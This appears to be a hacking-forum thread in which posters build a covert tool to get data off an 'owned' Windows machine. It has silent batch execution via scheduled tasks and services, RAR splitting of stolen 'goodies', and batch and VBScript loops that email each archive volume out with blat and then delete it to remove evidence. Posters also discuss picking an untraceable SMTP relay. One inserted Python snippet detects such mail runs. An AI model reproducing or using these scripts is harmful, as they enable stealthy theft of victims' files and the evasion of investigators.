
Getting data off an owned machine


Darren Kitchen

Recommended Posts

I wouldn't use a .bat script to do this, as it's going to be hard to actually hide the bat script's window. Any user is going to notice a window pop up and close. Does it have to send all that data at once though? I mean, can't you split all the data into very small chunks and every 30 mins or so send one chunk?

Link to comment
Share on other sites


It almost sounds like a custom rootkit. Nice.

srvany is the application that can turn a batch command into a service. Really easy to set up and I use it all the time. You just have to make sure that all registry settings and application info go into the 'All Users' profiles.

I could never get Blat to auth with Gmail. Gmail kept spitting an error back to me that I had to log in a certain way (I can't remember the exact error off the top of my head). It doesn't accept the auth command that Blat gives off.

So, I just signed up with a free SMTP host (inbox.com). It works out because if the user fires up Ethereal and sees where the emails are going, it really cannot be traced back to me.

I'm going to look into what it takes to set up a bare-bones SMTP server.

@Spider

If you set up a batch schedule with the at command, the batch runs under the system account and therefore runs silently. The user never sees the console window. The same thing works if you use srvany to make a service, or you could always call nircmd execcmd.

Link to comment
Share on other sites

OK, so blat doesn't work with Gmail SMTP out of the box; it doesn't handle SSL correctly. Supposedly stunnel can be used to wrap it correctly. I'm looking for some info on that now.

Also, it turns out that EXACTLY what we need has already been written at: http://weblogs.asp.net/nleghari/articles/gmailbackup.aspx

*However*, it requires .NET Framework 2.0, and it adds an icon to the systray. Bummer! Could have been perfect.

Link to comment
Share on other sites

Somewhere on this forum someone kept saying something about renaming the .bat to something like .cmd or command or something that starts with a C and reminds me of the word command, and if you do, NO window will come up.

I remember hearing of this twice but I can't seem to find it anymore.

Link to comment
Share on other sites

Got it working so that once the right parameters are met the data retrieval will begin and invisibly run the batch file. That's part 1. I've got the tools and commands to send email attachments via command line. That's part 3. Now part 2 is rar'ing the files for delivery. Shouldn't be long now.

Link to comment
Share on other sites

OK, I've got everything working now except for one last thing. (I say that now, but once the proof of concept is done you know feature creep will set in.) Anyway, here's the problem, and I'm sure it's something that could be done with a simple loop in batch. I'd RTFM, but I'm crashing hard after not sleeping for a few days, so I'll be lazy and ask.

Here's the deal: the hack is done. The goodies have been retrieved, then rar'd for size. To keep things simple we're using email with SSL, which means attachment size needs to be low. If the goodies are less than 5 MB it's no issue; a single rar file will do the trick. But if we've got, say, three 5 MB rar files to email, we'll need a loop.

Here's what we've got:

goodies.r00
goodies.r01
goodies.r02

and we need to do this to each file:

blat.exe <filename> -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

I'm absolutely exhausted. I'm going to crash and pick this back up in the morning. If anyone has a potential solution or suggestion let me know.

Oh, and thanks for everyone's input and help on this project. I won't forget your names when doing the segment this weekend.

Link to comment
Share on other sites

Can't you loop over the output of something like '<my_fileset>.*'?

Savages!

Maybe you can compile a second script from the first script which has that listing added into it?

Link to comment
Share on other sites

This is just a simple batch script.

It's been a long time, but it's something like:

IF NOT EXIST pwned.r00 GOTO end
:hak1
pwn box more send e-mail 2   (replace with script to send e-mail, I have no clue about those commands)
IF NOT EXIST pwned.r01 GOTO end
:hak2
pwn box more (same)
IF NOT EXIST pwned.r02 GOTO end
:hak3
...
more hacking code
...
:end
REM THIS BOX HAS BEEN PWNED BY HAK5.ORG

Someone should check that (it should be right, but I'm tired and batch programming was a long time ago) and finish it up to about r45 (45 for h4k5; I can't help but leave easter eggs in my code, even if it's a script kiddie egg).

And you may not want to add that last REMark.

Link to comment
Share on other sites

That code is good, except you either need to have a huge batch script just in case, or there is a large chance you could miss some files. It'd be good if we could iterate over a list as suggested above; however, my batch script ability isn't very strong, so I have no idea if it's feasible in a batch.

Link to comment
Share on other sites

Take a look at fastpush. All that is, is just a batch script, or any other program. The idea would be to choose the language to fit the program requirements; here we need to pass commands to the Windows command line, so using a batch script would be the best/fastest way, if not the simplest or smallest code. It works, that's all we need.

And this way there's nothing else trying to hide on the computer.

Link to comment
Share on other sites

Just had a great idea, modified your code a bit and used something I gleaned from a script in the switchblade thread:

@echo off
::initial variable values
SET fileNum=0
SET filename="pwned.r"

::make the number double digits and build the complete filename
SET fileNumPadded=0%fileNum%
SET fileNumPadded=%fileNumPadded:~-2%
SET filenameComplete=%filename%%fileNumPadded%
::check to see if the initial file exists, if not, jumps to after the loop
IF NOT EXIST %filenameComplete% GOTO noFiles

::the archive loop
:processFile
::do what we need with it here

::perform steps in preparation for next file
::increment the file number (kept without the leading zero: SET /a reads 08 and 09 as octal and fails)
SET /a fileNum=fileNum+1
::make the number double digits
SET fileNumPadded=0%fileNum%
SET fileNumPadded=%fileNumPadded:~-2%
::make a string containing the complete filename
SET filenameComplete=%filename%%fileNumPadded%

::check to see if next file exists and then loop
::else continue on
IF EXIST %filenameComplete% GOTO processFile

:noFiles
::Continue the script

How valid is that? Remember, my batch scripting skills suck.

**edit** Commented it better. Have since tested it, it works, except it executes on the first file regardless, so fixed that too.

**edit 2** Somewhere in my refinements, I have broken it. Will have a working version very soon.

**edit 3** Working again, placed a NOT on the wrong IF statement.

Link to comment
Share on other sites

I'm really looking forward to how this project will turn out.

Maybe a bit late, but here's an interesting C script for keylogging and mailing from Irongeek: http://www.irongeek.com/i.php?page=security/keylogger . Probably not useful for this project anymore, but still interesting.

Oh by the way, which C compiler did you use now, Darren?

Link to comment
Share on other sites

Copy and paste the code into goodies.vbs

Call the VBScript on the command line:

cscript /nologo goodies.vbs {filename*}

It will blat out all the files that match the filename*. Use * as the wildcard. (i.e. cscript /nologo goodies.vbs goodies* - this will send out every file in the folder that matches goodies.*: goodies.rar, goodies.r01, goodies.r02, etc.)

Set FSO = CreateObject("Scripting.FileSystemObject")
Set Shell = CreateObject("WScript.Shell")

ReDim arrFiles(1)
i = 0
Set Folder = FSO.GetFolder(".")
Set Files = Folder.Files

' collect every file in the current folder whose name matches the first argument
For Each File in Files
  If CheckFile(File.Name, WScript.Arguments(0)) Then
    If i > UBound(arrFiles) Then ReDim Preserve arrFiles(i*2)
    arrFiles(i) = File.Path
    i = i + 1
  End If
Next
If i = 0 Then WScript.Quit
ReDim Preserve arrFiles(i-1)

' run blat once per matched file (a bare blat.exe line is not valid VBScript, so it goes through WScript.Shell)
For Each FileName In arrFiles
  'WScript.Echo FileName
  Shell.Run "blat.exe """ & FileName & """ -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099", 1, True
Next

' DOS-style wildcard match: * and ? with special handling of the dot before the extension
Private Function CheckFile (ByVal Name, ByVal Filter)
  CheckFile = False
  FilterPos = 1
  NamePos = 1

  Do
    If FilterPos > Len(Filter) Then
      CheckFile = NamePos > Len(Name)
      Exit Function
    End If

    If Mid(Filter,FilterPos) = ".*" Then
      If NamePos > Len(Name) Then CheckFile = True
      Exit Function
    End If

    If Mid(Filter,FilterPos) = "." Then
      CheckFile = NamePos > Len(Name)
      Exit Function
    End If

    FilterCount = Mid(Filter,FilterPos,1)
    FilterPos = FilterPos + 1

    Select Case FilterCount
      Case "*"
        CheckFile = CheckFile2(Name,NamePos,Filter,FilterPos)
        Exit Function
      Case "?"
        If NamePos <= Len(Name) And Mid(Name,NamePos,1) <> "." Then NamePos = NamePos + 1
      Case Else
        If NamePos > Len(Name) Then Exit Function
        NameCount = Mid(Name,NamePos,1)
        NamePos = NamePos + 1
        If StrComp(FilterCount,NameCount,vbTextCompare) <> 0 Then Exit Function
    End Select
  Loop
End Function

' handles the part of the filter after a *: skip further wildcards, then try every position in Name
Private Function CheckFile2 (ByVal Name, ByVal NamePos0, ByVal Filter, ByVal FilterPos0)
  FilterPos = FilterPos0

  Do
    If FilterPos > Len(Filter) Then
      CheckFile2 = True
      Exit Function
    End If

    FilterCount2 = Mid(Filter,FilterPos,1)
    FilterPos = FilterPos + 1

    If FilterCount2 <> "*" And FilterCount2 <> "?" Then
      Exit Do
    End If
  Loop

  If FilterCount2 = "." Then
    If Mid(Filter,FilterPos) = "*" Then
      CheckFile2 = True
      Exit Function
    End If

    If FilterPos > Len(Filter) Then
      CheckFile2 = InStr(NamePos0,Name,".") = 0
      Exit Function
    End If
  End If

  For NamePos = NamePos0 To Len(Name)
    NameCount = Mid(Name,NamePos,1)

    If StrComp(FilterCount2,NameCount,vbTextCompare)=0 Then
      If CheckFile(Mid(Name,NamePos+1),Mid(Filter,FilterPos)) Then
        CheckFile2 = True
        Exit Function
      End If
    End If
  Next

  CheckFile2 = False
End Function

I didn't comment anything =/, so if you have any questions just ask and I'll explain.

Now you just have to fill in the credentials for blat and you should be good to go.

*Edit - Added argument option to script.

Link to comment
Share on other sites


OK, so as Cooper said twice, you can loop in the batch script, so instead of creating a new line each time, make the number a variable (r.%part%) and at the end make it add part = part+1, and at your line which checks if it exists, make it so that when it doesn't, it stops.

This method reduces (if you'd gone with 45) an estimated 120+ lines to an estimated 11 to 25 lines (depending on what you're still going to add in).

This, for example, should work...

IF EXIST pwned.r00 GOTO send
GOTO end

:hak1
set /a part=%part%+1
IF EXIST pwned.r%part% goto send
goto end

:send
blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
del pwned.r%part%
:: delete the evidence after sending
goto hak1

:end
exit

Link to comment
Share on other sites

OK, so I finished my code. I didn't go to 45, but sending 20 files should be enough, and I also prepped boristsr's code, but I have NO idea if it will work.

@ECHO OFF
IF NOT EXIST goodies.r00 GOTO end
blat.exe goodies.r00 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r01 GOTO end
blat.exe goodies.r01 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r02 GOTO end
blat.exe goodies.r02 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r03 GOTO end
blat.exe goodies.r03 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r04 GOTO end
blat.exe goodies.r04 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r05 GOTO end
blat.exe goodies.r05 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r06 GOTO end
blat.exe goodies.r06 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r07 GOTO end
blat.exe goodies.r07 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r08 GOTO end
blat.exe goodies.r08 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r09 GOTO end
blat.exe goodies.r09 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r10 GOTO end
blat.exe goodies.r10 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r11 GOTO end
blat.exe goodies.r11 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r12 GOTO end
blat.exe goodies.r12 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r13 GOTO end
blat.exe goodies.r13 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r14 GOTO end
blat.exe goodies.r14 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r15 GOTO end
blat.exe goodies.r15 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r16 GOTO end
blat.exe goodies.r16 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r17 GOTO end
blat.exe goodies.r17 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r18 GOTO end
blat.exe goodies.r18 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
IF NOT EXIST goodies.r19 GOTO end
blat.exe goodies.r19 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
:end
exit

If you expect to have to send more than 20 files, let me know and I'll update the code for more files.

And again, I have no idea if this will work:

@echo off
SET rarNum=0
SET rar="goodies.r"
::make the number double digits and build the filename
SET rarNumPadded=0%rarNum%
SET rarNumPadded=%rarNumPadded:~-2%
SET rarfile=%rar%%rarNumPadded%
IF NOT EXIST %rarfile% GOTO end

:hakit
blat.exe %rarfile% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099

::increment the file number (no leading zero here, SET /a would read 08 and 09 as octal and fail)
SET /a rarNum=rarNum+1
::make the number double digits again (the original padded %fileNum%, a leftover from the script this was adapted from)
SET rarNumPadded=0%rarNum%
SET rarNumPadded=%rarNumPadded:~-2%
SET rarfile=%rar%%rarNumPadded%

::check to see if next file exists and then loop
::else continue on
IF EXIST %rarfile% GOTO hakit

:end
exit

Link to comment
Share on other sites

Argh!!!

Are you ignoring my last post?

This will work, in fewer lines:

IF EXIST pwned.r00 GOTO send
GOTO end

:hak1
set /a part=%part%+1
IF EXIST pwned.r%part% goto send
goto end

:send
blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
del pwned.r%part%
:: delete the evidence after sending
goto hak1

:end
exit

Link to comment
Share on other sites


If you do decide to use this, you need to make some changes. WinRAR splits files either by adding part# to the filename or by creating a new file extension such as .r01, .r02, .r03, etc., depending on how the user wants to split files. Usually it's the latter. In either case it will always have a .rar extension for the first file.

So, in your code, you need to send the first .rar file, then go into your loop. Also, while in your loop you need to add a 0 to the file extension if the file number is below 10. I'm not sure what happens if you go into three digits; I've never had to split a file into that many chunks.

Link to comment
Share on other sites
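The naming sequence described just above (one .rar, then .r00, .r01, ...) sent as a run of separate messages to one outside address is exactly what a mail gateway or SIEM can key on. As an added example, not code from this thread, here is a Python check over a constructed gateway log format (the field names and sample lines are assumptions) that flags such a run from one host to one external recipient:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format (an assumption, not any real gateway's format):
# <ISO time> host=<sending host> to=<recipient> attach=<filename> size=<bytes>
LOG_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) to=(?P<rcpt>\S+) "
    r"attach=(?P<name>\S+) size=(?P<size>\d+)$"
)
# Old-style WinRAR multi-volume names as described in the thread:
# goodies.rar, then goodies.r00, goodies.r01, ...
VOLUME_RE = re.compile(r"^(?P<base>.+)\.(?:rar|r\d{2})$", re.IGNORECASE)

def parse(line):
    """Parse one constructed gateway log line; return None for unrelated lines."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    ev["size"] = int(ev["size"])
    return ev

def find_split_archive_exfil(lines, internal_domain, min_volumes=3,
                             window=timedelta(hours=6)):
    """Group archive-volume attachments by (host, external recipient, base name) and
    flag groups of at least min_volumes messages inside one window. The window is
    wide on purpose: the thread proposes sending one chunk every 30 minutes."""
    groups = defaultdict(list)
    for line in lines:
        ev = parse(line)
        if ev is None or ev["rcpt"].lower().endswith("@" + internal_domain.lower()):
            continue  # unparseable or internal mail: out of scope here
        vol = VOLUME_RE.match(ev["name"])
        if vol:
            groups[(ev["host"], ev["rcpt"], vol.group("base").lower())].append(ev)
    alerts = []
    for (host, rcpt, base), evs in groups.items():
        evs.sort(key=lambda e: e["ts"])
        if len(evs) >= min_volumes and evs[-1]["ts"] - evs[0]["ts"] <= window:
            alerts.append({"host": host, "rcpt": rcpt, "archive": base,
                           "volumes": [e["name"] for e in evs],
                           "bytes": sum(e["size"] for e in evs)})
    return alerts

# Constructed sample log: one legitimate internal mail, a four-volume run from ws17
# to an outside address spaced 30 minutes apart, and a lone archive from another host.
SAMPLE_LOG = """\
2007-03-01T22:10:05 host=ws17 to=bob@corp.example attach=report.pdf size=51233
2007-03-01T22:31:40 host=ws17 to=drop@example.net attach=goodies.rar size=5242880
2007-03-01T23:01:42 host=ws17 to=drop@example.net attach=goodies.r00 size=5242880
2007-03-01T23:31:44 host=ws17 to=drop@example.net attach=goodies.r01 size=5242880
2007-03-02T00:01:46 host=ws17 to=drop@example.net attach=goodies.r02 size=918273
2007-03-02T09:15:00 host=ws03 to=vendor@example.org attach=photos.rar size=2048000
""".splitlines()
```

Calling find_split_archive_exfil(SAMPLE_LOG, "corp.example") returns one alert for ws17 listing the four goodies.* volumes and their combined size; the lone photos.rar and the internal report.pdf are not flagged.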


Thanks for the pointers, fixed it to work now (but bummer about the amount of lines).

IF EXIST pwned.rar GOTO 5end1
IF EXIST pwned.r00 GOTO 5end1
GOTO end

:hak1
set /a part=%part%+1
IF %part% LSS 10 (goto less10) ELSE (goto more10)

:less10
IF EXIST pwned.r0%part% goto sendless10
goto end
:more10
IF EXIST pwned.r%part% goto send
goto end

:5end1
blat.exe pwned.rar -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
del pwned.rar
:: delete the evidence after sending
goto hak1

:sendless10
blat.exe pwned.r0%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
del pwned.r0%part%
:: delete the evidence after sending
goto hak1

:send
blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099
del pwned.r%part%
:: delete the evidence after sending
goto hak1

:end
exit

At this point gmullen's last small bit would probably be better, as it's fewer lines of code ...

(though I don't know the issues ....)

Link to comment
Share on other sites
